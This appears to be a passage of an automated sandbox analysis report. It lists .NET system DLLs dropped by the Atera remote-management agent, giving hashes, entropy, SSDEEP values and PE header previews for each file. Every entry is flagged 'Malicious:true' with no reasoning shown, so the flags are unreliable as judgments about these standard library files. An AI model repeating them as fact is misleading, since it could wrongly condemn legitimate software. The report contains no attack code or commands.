                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ..............................S.....@.................................0+..O....@..................((...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.858418738536182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:t6NxhqWD4W5wP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFAyboMFHR:AIWD4WmiNyb8E9VF6IYijSJIVxM0nHR
                                                                                                                                                                                                                                        MD5:E404E9D0E1857318AD4555418621D2C3
                                                                                                                                                                                                                                        SHA1:2A3D60967A08001EFD9E0B2E32BC8E98127794A4
                                                                                                                                                                                                                                        SHA-256:202A54DF5243F3362BB4DA4C093654DEDE7F94E43B050E20FFB22291418E6E66
                                                                                                                                                                                                                                        SHA-512:7A02392420816325DB8930339255CEAF51C11C0AD03501CEA6F226F365740D2BB98C99AA05D04F5A4C4F239A77CC6B40A076BE093BE19C4A1E65A42231AF7C5E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................p....@..................................(..O....@..@...............((...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.7840723636197335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:aW2KxVSWzQW5qPFNyby2sE9jBF6IYiYF85S35IVnxGUHFh/JZlGWxX5m:NMWzQWc9Nyb8E9VF6IYijSJIVxN/JvW
                                                                                                                                                                                                                                        MD5:5F1F5EC1E68D69D5C768D0A7707286E7
                                                                                                                                                                                                                                        SHA1:EEB435A9A79D06584231F4FD91734CFC94C351C2
                                                                                                                                                                                                                                        SHA-256:C9720AE379F8069952500F75C3191E311B1537D8515047B2236E9A5B35C60390
                                                                                                                                                                                                                                        SHA-512:4FE171C36EECADDFBE6B068326A05D7465BA8A6C4A81D2885D6BD94A628393006AF4CB15CB12AC04B6E8A42FBAEC73C1F43BA5A92180B3A109607CB47302A0F1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ..............................l?....@..................................)..O....@..@...............((...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.72570998567299
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9xDHKWAMWcpNyb8E9VF6IYijSJIVxlPK0h:DD8GtEpYi60Vp
                                                                                                                                                                                                                                        MD5:6DC964E9A729F59D3F7ACDB9A27C9C45
                                                                                                                                                                                                                                        SHA1:8983467CABE35B6C46CFDE8E8EFD548BF498B061
                                                                                                                                                                                                                                        SHA-256:D4A35F9CB91B7910C8C247DD7A07BBAD7D625787B82C4117712BA9FEB6055912
                                                                                                                                                                                                                                        SHA-512:A0511371083A659F0B344DB5A92280E2B98CFDCFC9C4075F40E4DE295184DD189E22ED563D04D2EC547B4363549AAFC34E51F80B3D6621D0A449DD746A0C2C4F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ...............................l....@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.831254121146028
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qLNBEW6pWx7Nyb8E9VF6IYijSJIVxdT1qeyOPx:qbMSXEpYi60pLx
                                                                                                                                                                                                                                        MD5:A2C4B2E2B08F80F9292FC60801A8C757
                                                                                                                                                                                                                                        SHA1:C058F7FB26416722F27C7AA50D9DBD53DB012C7B
                                                                                                                                                                                                                                        SHA-256:E9A7AC50555C363CF88675038991DF98D97B4E074F394A0496DCABC00D66770D
                                                                                                                                                                                                                                        SHA-512:58958CC25797272042659CD25F06C9211B164F2A522F03ED53B24B11357E0A5A6FF932A5F1C398AF223AFEBFF96F0623B5EBD70AC7EE0A42C21701658453A513
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.884487188270577
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yKkHKW/tWBpNyb8E9VF6IYijSJIVxkNKuTWOr7o:numtEpYi60Wldo
                                                                                                                                                                                                                                        MD5:5DB94DA2D50F9660D9F749BE056434B6
                                                                                                                                                                                                                                        SHA1:4C1DAE91099886424AB3A813D44FBA6A636CF176
                                                                                                                                                                                                                                        SHA-256:30CAF11BCC29237D52C83374EE580F0FF4B7A9DCBF21CD75A1B17B2B11D7B2E8
                                                                                                                                                                                                                                        SHA-512:EABF9832024E1505CBC238D2F9D4A777CC6DF7797340EB25DE8DBEF7C4C4682A9502B143BEC3664643F3888647DA606D9A172B21D71DD478040D4F3A51B3732B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................FP....@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8318443464700875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TLnfIWqrWx8Nyb8E9VF6IYijSJIVx7Dq1ba7A+:TDf4ocEpYi60gb7+
                                                                                                                                                                                                                                        MD5:B78CE612B7E92466B36CDFF4431AD1A6
                                                                                                                                                                                                                                        SHA1:9248C5EB01AAD3AD4C12677EAF1BC2E4126B9738
                                                                                                                                                                                                                                        SHA-256:23436583765A3180081E2C6B96B8F177799A7AC2B1ECBEA226BC96D2EB04D0B9
                                                                                                                                                                                                                                        SHA-512:7F25F3DDDCC9A2633C6DCECBE0BD83BE6CC6827C760666DF766FE5F87F506BED6C94E6A301E4BA49F603F6858CB2F5DA4FF758DCB82E5D1AF250E005DA3D48A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................s....@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17960
                                                                                                                                                                                                                                        Entropy (8bit):6.673296258904213
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Dh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeB57c:Dy9gpEpYi60Ae
                                                                                                                                                                                                                                        MD5:3A0946ABA4AA0B0B5778A250F6ED27AC
                                                                                                                                                                                                                                        SHA1:B970229FFA04428F6D60D1C9381ABF320D424D0A
                                                                                                                                                                                                                                        SHA-256:472BF1CC97392CC7F346C9F4324DD826C279C99CAB990119CC80DA3FBDDC2129
                                                                                                                                                                                                                                        SHA-512:33DE603317DF5ACB9CD1E7649B0834E8836DC208366E75133564280C18A17404A9F55FC8682319ACD94CA4C175F95D6F8F6C3F2330259B563526B594A4AEC17B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.812805534610478
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Jna8WK1WLfNyb8E9VF6IYijSJIVxY439G:Jna0ojEpYi60i
                                                                                                                                                                                                                                        MD5:D28FF1505221F33F58296E951C1789EB
                                                                                                                                                                                                                                        SHA1:E0FA2F18A762E06F7D64B4A9C512E37D9AEAB600
                                                                                                                                                                                                                                        SHA-256:53E0F85233A90E560E0B9C4DAEF8945A838505DF2CC3BB1A7EA36765BB698620
                                                                                                                                                                                                                                        SHA-512:5C40A5872BBEE334A140E8046BF089E21098DC06176EE594D023F8440AFE3CDA1778DA8BF4725D7C9F95BAAD52F8E2E74C3F74D07DFF58EBA238844FC96F8623
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ....................................@..................................*..O....@..................((...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.765085373011992
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:5BSWITWWSNyb8E9VF6IYijSJIVx3mR6ZX:56LyEpYi60WR2
                                                                                                                                                                                                                                        MD5:15C00D2B3289442A382E8E358EE92040
                                                                                                                                                                                                                                        SHA1:A218EB0F26AE8D22CF2DC42AB1DBBA7050E10703
                                                                                                                                                                                                                                        SHA-256:0CE8E3ED177E94382208B61D28BE3EB32269A3F208A1AD614A0AA37B9A8B5A63
                                                                                                                                                                                                                                        SHA-512:81E41383E3C2E250FAD471B1E4733BDF3378804C88BC0AFC239EF9D3FD129A76982BCE40B52DCD96371DCFE78E9CD5A6751BB00E70EDCBC4EDC0A7879FFA167A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ..............................;.....@..................................)..O....@.. ...............((...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.872654686394797
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:G88cIIWNoWJiNyb8E9VF6IYijSJIVxJMuG0:G9cU7iEpYi60G0
                                                                                                                                                                                                                                        MD5:989839E4FF834AFA88C8A89D5C5B0A55
                                                                                                                                                                                                                                        SHA1:4DE5124ABAD5C0230A7D6E88822A4E28A90BA309
                                                                                                                                                                                                                                        SHA-256:1179CB6F638E6DAA670B75A82ACCEE65788969C6355C03D9DF708406269E7584
                                                                                                                                                                                                                                        SHA-512:A14463B212D223E7D987A3BDABDCB09DEF7AFCCD184F8D034B93DB52D913EB89541927CBDFB3BC0C558A731FC09C3DDE78B9991BEAEED468F8F6A52138FFE98F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ...............................z....@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22568
                                                                                                                                                                                                                                        Entropy (8bit):6.620984449083178
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hkUwx9rm5go1fWKmmW4oqN5dWjaWbJNyb8E9VF6IYijSJIVxowXpaY1:QrmoFmWXX/NEpYi60bwY1
                                                                                                                                                                                                                                        MD5:2F2FFAB3A3B163FF7704A5766DA30D8F
                                                                                                                                                                                                                                        SHA1:A9A9779721AE2EAE2E26464518FCF618B2F52D30
                                                                                                                                                                                                                                        SHA-256:63BBF869A66DB2BA9507B435B2964CCD91BA713AF3C64E757C0C4E40A8B5606A
                                                                                                                                                                                                                                        SHA-512:D1CB33B4E9DCDFEFE6D10DF235E1D3082E58E9EF0A4E4EF337775636C050D14E97CA4F238E7D33D7FDD786057801679D0B03BB8E728CE97BE2725E80965334A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ...............................O....@.................................PE..O....`..x............0..((...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18472
                                                                                                                                                                                                                                        Entropy (8bit):6.674513594159353
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:509bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVss:wOAghbsDCyVnVc3p/i2fBVlAO/BRU+pm
                                                                                                                                                                                                                                        MD5:A6DD4492122C3B05E26841BF763D8CA8
                                                                                                                                                                                                                                        SHA1:4EE03E0DB9DE2179888F3ACF713E74DCF3501E29
                                                                                                                                                                                                                                        SHA-256:7AF874CFCD34E341458ACF7F7B2BE5A6EFD51CA4CF63136F64E608F04C1FD96B
                                                                                                                                                                                                                                        SHA-512:E139B82D73F09759E5B26088FBC22E58BAF5A70ABD63444CBFF152EB3F4A5720F108B84047F55D4756E822D4A2CC94B01D75540785AE7A108697FD0BE7F4D483
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ..............................)<....@................................. 5..O....@..P............ ..((...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.833205974292201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cmYx4AW6RW5wPSNyby2sE9jBF6IYiYF85S35IVnxGUHFt7kRF0IMT:c7W6RWmaNyb8E9VF6IYijSJIVxZ799T
                                                                                                                                                                                                                                        MD5:119FB494DE18C7851BE378596E0DB77C
                                                                                                                                                                                                                                        SHA1:0661625ACE5556827D8655DE364CC0B9249775C5
                                                                                                                                                                                                                                        SHA-256:71D4DD649DEED3D934F17215D1CD0D53D906E6500946C4A1C73E7A7F4F588EA7
                                                                                                                                                                                                                                        SHA-512:63DD9F9733D80D8F560CBE7CA577CCBB81EF14A33E54A39C61AC152F2BF22434D3D105C377E50A7002A58D9E00829F275452D56129401AC4B14C10E675CEBC75
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................}.....@.................................T(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.92349173979631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:eI5HeWFwTBsWWcNyb8E9VF6IYijSJIVxuKdCd8d:eI5HFwTBI8EpYi60lA8d
                                                                                                                                                                                                                                        MD5:E6B5F6440BC7D3CAE67E367AE3B3C0C6
                                                                                                                                                                                                                                        SHA1:E7AC1D39F72E44D31927F10717FD29D6DC442984
                                                                                                                                                                                                                                        SHA-256:FFC1B5DEEBA31D33130A2FFF846BB6A9C7B3C5D977CD30E04964F1D42DF77D10
                                                                                                                                                                                                                                        SHA-512:94B66BC2797DCF48E3DCA504B0AE76A11438826BFADCFFF20938FA52820DD1E97B767DB1C3D200E0B4CF57EC1FF776462B9F88A4AC8BF4377BD3FF0150A1799D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................|)..O....@..................((...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.892290398632148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:uAJpVWbfkBnWRXNyb8E9VF6IYijSJIVxnBF5:uAJpWfkBAbEpYi60X5
                                                                                                                                                                                                                                        MD5:A1F1422C8B103D8B855DAE40D5E61142
